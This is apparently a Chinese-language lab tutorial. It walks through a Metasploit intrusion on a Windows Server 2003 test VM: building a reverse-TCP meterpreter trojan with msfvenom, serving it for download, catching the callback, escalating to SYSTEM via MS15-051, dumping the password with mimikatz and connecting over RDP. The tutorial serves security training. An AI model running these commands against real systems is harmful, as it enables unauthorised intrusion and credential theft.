ms15-051提权

2023-11-20 18:10
文章标签 提权 051 ms15

本文主要是介绍ms15-051提权,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

ms15-051提权

实验概述
  Metasploit是一款开源的渗透测试工具,可以帮助安全员发现漏洞问题,此工具带有的攻击模块可以帮助安全员简单的利用相关的漏洞,本实验通过Metasploit对内网机器进行渗透,并且使用ms15-051进行权限提升获取window server 2003的system权限,最后进行远程控制。

实验目的
  1、熟练metasploit的使用方法
  2、学会msfvenom命令的基本格式
  3、了解ms15-051漏洞

实验原理
  Metasploit框架使Metasploit具有良好的可扩展性,它的控制接口负责发现漏洞、攻击漏洞,提交漏洞,然后通过一些接口加入攻击后处理工具和报表工具。Metasploit框架可以从一个漏洞扫描程序导入数据,使用关于有漏洞主机的详细信息来发现可攻击漏洞,然后使用有效载荷对系统发起攻击。所有这些操作都可以通过Metasploit的Web界面进行管理,而它只是其中一种种管理接口,另外还有命令行工具和一些商业工具等等。攻击者可以将来漏洞扫描程序的结果导入到Metasploit框架的开源安全工具Armitage中,然后通过Metasploit的模块来确定漏洞。一旦发现了漏洞,攻击者就可以采取一种可行方法攻击系统,通过Shell或启动Metasploit的meterpreter来控制这个系统。这些有效载荷就是在获得本地系统访问之后执行的一系列命令。这个过程需要参考一些文档并使用一些数据库技术,在发现漏洞之后开发一种可行的攻击方法。其中有效载荷数据库包含用于提取本地系统密码、安装其他软件或控制硬件等的模块,这些功能很像以前BO2K等工具所具备的功能。

msfvenom命令:

-p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定
-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled <length> 为payload预先指定一个NOP滑动长度
-f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch <architecture> 指定payload的目标架构
--platform <platform> 指定payload的目标平台
-s, --space <length> 设定有效攻击荷载的最大长度
-b, --bad-chars <list> 设定规避字符集,比如: &#039;\x00\xff&#039;
-i, --iterations <count> 指定payload的编码次数
-c, --add-code <path> 指定一个附加的win32 shellcode文件
-x, --template <path> 指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
--payload-options 列举payload的标准选项
-o, --out <path> 保存payload
-v, --var-name <name> 指定一个自定义的变量,以确定输出格式
--shellest 最小化生成payload
-h, --help 查看帮助选项
--help-formats 查看msf支持的输出格式列表
生成payload必须要使用“-p”来指定要使用的payload,“-f”来指定输出的格式,命令如:Msfvenom -p windows/meterpreter/bind_tcp -f exe

Windows本地权限提升漏洞cve-2015-1701

受影响系统:
Microsoft Windows Vista
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2012
Microsoft Windows Server 2008 R2
Microsoft Windows Server 2008
Microsoft Windows Server 2003
Microsoft Windows RT 8.1
Microsoft Windows RT
Microsoft Windows 8.1
Microsoft Windows 8
Microsoft Windows 7
漏洞成因:Win32k.sys内核模式驱动程序没有正确处理内存对象,在实现上存在权限提升漏洞。
漏洞危害:成功利用此漏洞可使攻击者在内核模式中运行任意代码。
漏洞利用:攻击者必须具有有效的登录凭证,并且可以本地登录以利用此漏洞。

实验环境
  虚拟机:kali-linux(攻击机)、window server 2003(靶机)
  工具:metasploit

实验步骤
1、查看攻击机IP:
在这里插入图片描述
2、使用msfvenom生成木马:

msfvenom –p windows/metepreter/reverse_tcp lhost=192.168.10.10 lport=4444 –f exe >shell.exe

在这里插入图片描述
3、把生成的木马挂在服务器上等靶机下载
在这里插入图片描述
4、把生成的木马复制到网站目录
在这里插入图片描述
5、使用msf里面的handler模块
操作:“msfconsole”->“use exploit/multi/handler”->“show options”
在这里插入图片描述
6、设置攻击payload
操作:“set payload windows/meterpreter/reverse.tcp”->“show options”
注意payload要与木马的payload一致
在这里插入图片描述
7、设置payload参数
操作:“set lhost 192.168.10.10”->“set lport 4444”->“show options”
在这里插入图片描述
8、输入“exploit”开始攻击,等待木马连接
在这里插入图片描述
9、重新启动网站
操作:“新建终端”->“ /opt/lampp/lampp restart”
在这里插入图片描述
10、切换到靶机访问 ”http://攻击机IP/shell” 下载木马
在这里插入图片描述
11、靶机双击运行木马
在这里插入图片描述
12、攻击机成功获取到靶机的shell,使用 “getuid”查看为administrator权限
在这里插入图片描述
13、使用ms15-051漏洞,进一步获取system最高权限
操作:“background把会话切换进后台”->“use exploit/windows/local/ms15_051_client_copy_image”-> “show options”
在这里插入图片描述
14、设置payload,设置payload参数
操作:“set payload windows/meterpreter/reverse_tcp”->“set session 1”->“set lhost 192.168.10.10”->“set lport 4444”->“show options”
注意payload要与木马的payload一致
在这里插入图片描述
在这里插入图片描述
15、输入“run”攻击成功,使用“getuid”查看已是system用户
在这里插入图片描述
16、加载mimikatz获取administrator的密码
在这里插入图片描述
17、远程连接靶机
操作:“rdesktop 192.168.10.120”->“输入帐号密码”
在这里插入图片描述
18、成功入侵到靶机,使用命令“ipconfig”查看IP,使用 “whoami”查看用户
在这里插入图片描述
思考总结
  本实验使用msfvenom生成木马并且挂载到网站上,等待靶机下载木马并且运行,随后通过msf获取windows shell,在通过ms15-051漏洞获取靶机的system权限,获取administrator密码后,通过远程连接入侵靶机

这篇关于ms15-051提权的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/396467

相关文章

新160个crackme - 051-Keygenning4newbies

运行分析 需要破解Name和Serial PE分析 C++程序,32位,无壳 静态分析&动态调试 ida找到关键字符串,双击进入函数 静态分析得到以下结论:1、Name长度要大于4,小于502、v5 += Name[i] ^ (i + 1)3、v7 = 最后一个Name[i] ^ (i + 1)4、Serial = (v5<<7) + 6* v7 的16进制

linux 内核提权总结(demo+exp分析) -- 任意读写(四)

hijack_modprobe_path篇 本文转自网络文章,内容均为非盈利,版权归原作者所有。 转载此文章仅为个人收藏,分享知识,如有侵权,马上删除。 原文作者:jmpcall 专栏地址:https://zhuanlan.kanxue.com/user-815036.htm     原理同hijack_prctl, 当用户执行错误格式的elf文件时内核调用call_usermod

linux 内核提权总结(demo+exp分析) -- 任意读写(三)

hijack_prctl篇 本文转自网络文章,内容均为非盈利,版权归原作者所有。 转载此文章仅为个人收藏,分享知识,如有侵权,马上删除。 原文作者:jmpcall 专栏地址:https://zhuanlan.kanxue.com/user-815036.htm   prctl函数: 用户态函数,可用于定制进程参数,非常适合和内核进行交互 用户态执行prctl函数后触发prctl系统

linux 内核提权总结(demo+exp分析) -- 任意读写(二)

hijack_vdso篇 本文转自网络文章,内容均为非盈利,版权归原作者所有。 转载此文章仅为个人收藏,分享知识,如有侵权,马上删除。 原文作者:jmpcall 专栏地址:https://zhuanlan.kanxue.com/user-815036.htm     vdso: 内核实现的一个动态库,存在于内核,然后映射到用户态空间,可由用户态直接调用 内核中的vdso如果被修改

linux 内核提权总结(demo+exp分析) -- 任意读写(一)

cred篇 本文转自网络文章,内容均为非盈利,版权归原作者所有。 转载此文章仅为个人收藏,分享知识,如有侵权,马上删除。 原文作者:jmpcall 专栏地址:https://zhuanlan.kanxue.com/user-815036.htm   每个线程在内核中都对应一个线程结构块thread_infothread_info中存在task_struct类型结构体 struct t

linux 内核提权总结(demo+exp分析) -- ROP(二)

ret2usr CR4篇 本文转自网络文章,内容均为非盈利,版权归原作者所有。 转载此文章仅为个人收藏,分享知识,如有侵权,马上删除。 原文作者:jmpcall 专栏地址:https://zhuanlan.kanxue.com/user-815036.htm   smep: smep是内核的一种保护措施, 使得内核不可执行用户态代码 内核通过CR4寄存器的第20位来控制smep,

linux 内核提权总结(demo+exp分析) -- ROP(一)

基础ROP篇(linux 5.0.21) 本文转自网络文章,内容均为非盈利,版权归原作者所有。 转载此文章仅为个人收藏,分享知识,如有侵权,马上删除。 原文作者:jmpcall 专栏地址:https://zhuanlan.kanxue.com/user-815036.htm   内核提权与用户态攻击的区别 攻击流程 用户态攻击: 执行 system("/bin/sh") 获得shel

MySQL之UDF提权复现

什么是UDF: UDF(Userfined function)用户自定义函数,是MySQL的一个扩展接口,用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用。 提权条件: 知道MySQL用户名和密码,可以登录MySQL有写入文件权限,即 secure_file_priv 的值为空 注意:使用 UDF 提权是在没有获取到 webshel

抽象类_接口_内部类JAVA048-051

来源:http://www.bjsxt.com/ 1、S01E048_01抽象(abstract)类和抽象方法 抽象方法的意义:将方法的设计和方法的实现分离 2、S01E049_01接口(interface)详解 (1)接口中只有:常量和抽象方法; (2)常量定义时public static final写或不写都可以; (3)方法声明时public abstract写或不写都可以;

WEB渗透Linux提权篇-环境变量提权

往期文章  WEB渗透Linux提权篇-提权工具合集-CSDN博客   第一种 假设存在一个脚本代码为 #include<unistd.h>void main(){setuid(0);setgid(0);system("ps");} 编译>gcc demo.c -o shell>chmod u+s shell执行./shell 回显ps命令提权find / -per